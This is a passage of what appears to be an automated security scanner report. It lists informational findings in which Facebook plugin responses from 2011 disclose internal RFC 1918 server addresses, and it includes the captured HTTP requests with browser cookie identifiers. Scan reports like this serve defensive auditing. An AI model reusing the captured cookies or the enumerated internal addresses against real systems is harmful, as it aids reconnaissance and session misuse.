rigin%3Dhttp%253A%252F%252Ftunedin.blogs.time.com%252Ff1d847ebd%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df422bb964&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://tunedin.blogs.time.com/2011/06/13/game-of-thrones-watch-its-all-in-the-execution-2/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=Wd6UP

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.248.117
X-Cnection: close
Date: Mon, 13 Jun 2011 11:18:01 GMT
Content-Length: 254

<script type="text/javascript">
parent.postMessage("cb=f206a18218&origin=http\u00253A\u00252F\u00252Ftunedin.blogs.time.com\u00252Ff1d847ebd&relation=parent&transport=postmessage&frame=f422bb964", "ht
...[SNIP]...

22.70. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.237.35

Request

GET /extern/login_status.php?api_key=125384590834102&app_id=125384590834102&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df19af7fcac%26origin%3Dhttp%253A%252F%252Fthesouthern.com%252Fff013de94%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df25abc24fc%26origin%3Dhttp%253A%252F%252Fthesouthern.com%252Fff013de94%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df170bb261%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df342e4f04%26origin%3Dhttp%253A%252F%252Fthesouthern.com%252Fff013de94%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df170bb261&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df37f81a90%26origin%3Dhttp%253A%252F%252Fthesouthern.com%252Fff013de94%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df170bb261&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df122744bfc%26origin%3Dhttp%253A%252F%252Fthesouthern.com%252Fff013de94%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df170bb261&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.237.35
X-Cnection: close
Date: Mon, 13 Jun 2011 11:02:03 GMT
Content-Length: 239

<script type="text/javascript">
parent.postMessage("cb=f37f81a90&origin=http\u00253A\u00252F\u00252Fthesouthern.com\u00252Fff013de94&relation=parent&transport=postmessage&frame=f170bb261", "http:\/\/t
...[SNIP]...

22.71. http://www.facebook.com/plugins/activity.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.226.37

Request

Response

22.72. http://www.facebook.com/plugins/comments.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/comments.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.32.196.109

Request

Response

22.73. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.221.39

Request

GET /plugins/like.php?href=www.facebook.com%2Fexpedia&layout=button_count&show_faces=false&width=90&action=like&colorscheme=light&height=21&ref=header HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/New-York-Hotels-Millenium-Hilton.h892034.Hotel-Information?chkin=7%2F14%2F2011&hashTag=default&chkout=7%2F18%2F2011&mcicid=112321680&rm1=a2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=Wd6UP

Response

22.74. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.235.50

Request

GET /plugins/like.php?href=http://www.ugo.com/tv/game-of-thrones-baelor-preview&layout=box_count&show_faces=false&width=45&action=like&font&colorscheme=light&height=65 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.ugo.com/tv/game-of-thrones-baelor-preview
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=Wd6UP

Response

22.75. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.51.55

Request

GET /plugins/like.php?href=http://thunderousintentions.com/2011/06/13/heatles-flame-out-james-abdicates-the-throne/&layout=button_count&show-faces=false&width=85&action=like&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://fansided.com/category/nba/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=Wd6UP

Response

22.76. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.53.52.45

Request

GET /plugins/like.php?href=www.facebook.com%2Fexpedia&layout=button_count&show_faces=false&width=90&action=like&colorscheme=light&height=21&ref=header HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/daily/promos/deals/summervacationsale/default.asp?mcicid=summersale2011?brandcid=brandCampaign
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=Wd6UP

Response

22.77. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.42.38

Request

GET /plugins/like.php?href=http://feedproxy.google.com/~r/KingJamesGospel/~3/SdGasCXH0sE/&layout=button_count&show-faces=false&width=85&action=like&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://fansided.com/category/nba/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=Wd6UP

Response

22.78. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.119.55

Request

GET /plugins/like.php?href=http://thesmokingcuban.com/2011/06/12/at-the-half-the-mavs-lead-53-51/&layout=button_count&show-faces=false&width=85&action=like&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://fansided.com/category/nba/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=Wd6UP

Response

22.79. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.236.75

Request

Response

22.80. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.204.53

Request

GET /plugins/like.php?api_key=249141081161&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1ac51108c%26origin%3Dhttp%253A%252F%252Fwww.mavsmoneyball.com%252Ff39bc43f7c%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%253A%252F%252Fwww.mavsmoneyball.com%252F2011%252F6%252F12%252F2220848%252Fnba-finals-2011-dallas-mavericks-win-their-first-ever-championship&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.mavsmoneyball.com/2011/6/12/2220848/nba-finals-2011-dallas-mavericks-win-their-first-ever-championship
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

22.81. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.215.37

Request

GET /plugins/like.php?href=http://kotaku.com/5811225/a-game-of-thrones-isnt-a-game-at-all-without-sean-bean&layout=button_count&show_faces=false&width=126&action=like&colorscheme=light&height=24&font=lucida+grande HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://kotaku.com/5811225/a-game-of-thrones-isnt-a-game-at-all-without-sean-bean
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=Wd6UP

Response

22.82. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.32.191.117

Request

GET /plugins/like.php?api_key=119370714775514&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df26580993%26origin%3Dhttp%253A%252F%252Fwww.tvfanatic.com%252Ffa7644554%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Fwww.tvfanatic.com%2F2011%2F06%2Fgame-of-thrones-review-baelor%2F&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=100 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.tvfanatic.com/2011/06/game-of-thrones-review-baelor/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=Wd6UP

Response

22.83. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.245.61

Request

GET /plugins/like.php?api_key=198078866886655&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3bb274c4%26origin%3Dhttp%253A%252F%252Ftunedin.blogs.time.com%252Ff1d847ebd%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=none&href=http%3A%2F%2Ftunedin.blogs.time.com%2F2011%2F06%2F13%2Fgame-of-thrones-watch-its-all-in-the-execution-2%2F%3Fxid%3Dfblike&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://tunedin.blogs.time.com/2011/06/13/game-of-thrones-watch-its-all-in-the-execution-2/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=Wd6UP

Response

22.84. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.53.35.27

Request

GET /plugins/like.php?api_key=131538103586818&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df24ee1961%26origin%3Dhttp%253A%252F%252Fwww.expedia.com%252Ff359f099c4%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.expedia.com%2Fdaily%2Fpromos%2Fdeals%2Fsummervacationsale%2Fdefault.asp%3Fbrandcid%3Dfacebook.mch.deals.SummerSaleIndex0511&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=100 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/daily/promos/deals/summervacationsale/default.asp?mcicid=summersale2011?brandcid=brandCampaign
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=Wd6UP

Response

22.85. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.203.63

Request

Response

22.86. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.108.33

Request

GET /plugins/like.php?href=http://allucanheat.com/2011/06/12/top-ten-reasons-lebron-james-will-have-the-last-laugh-vs-dallas/&layout=button_count&show-faces=false&width=85&action=like&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://fansided.com/category/nba/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=Wd6UP

Response

22.87. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.55.39

Request

GET /plugins/like.php?api_key=249141081161&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfc559d2d4%26origin%3Dhttp%253A%252F%252Fwww.mavsmoneyball.com%252Ff39bc43f7c%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%253A%252F%252Fwww.mavsmoneyball.com%252F2011%252F6%252F12%252F2220848%252Fnba-finals-2011-dallas-mavericks-win-their-first-ever-championship&layout=standard&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=630 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.mavsmoneyball.com/2011/6/12/2220848/nba-finals-2011-dallas-mavericks-win-their-first-ever-championship
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

22.88. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.53.0.37

Request

GET /plugins/like.php?href=http://sportdfw.com/2011/06/13/10-observations-dallas-mavs-finals/&layout=button_count&show-faces=false&width=85&action=like&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/2011/06/13/10-observations-dallas-mavs-finals/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

22.89. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.32.209.191

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2Fpages%2FFanSided%2F108254959223467&layout=button_count&show_faces=false&width=84&action=like&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/aboutcontact-us/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=Wd6UP

Response

22.90. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.123.39

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2Fpages%2FFanSided%2F108254959223467&layout=button_count&show_faces=false&width=84&action=like&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/z-the-fort-worth-four/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=Wd6UP

Response

22.91. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.100.38

Request

GET /plugins/like.php?href=http://allucanheat.com/2011/06/13/just-wasnt-miamis-time-mavericks-close-out-the-heat-with-game-6-win/&layout=button_count&show-faces=false&width=85&action=like&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://fansided.com/category/nba/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=Wd6UP

Response

22.92. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.228.75

Request

Response

22.93. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.106.37

Request

GET /plugins/like.php?href=http://savingtheskyhook.com/2011/06/12/subplots-don%E2%80%99t-matter-now-its-all-about-the-game/&layout=button_count&show-faces=false&width=85&action=like&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://fansided.com/category/nba/
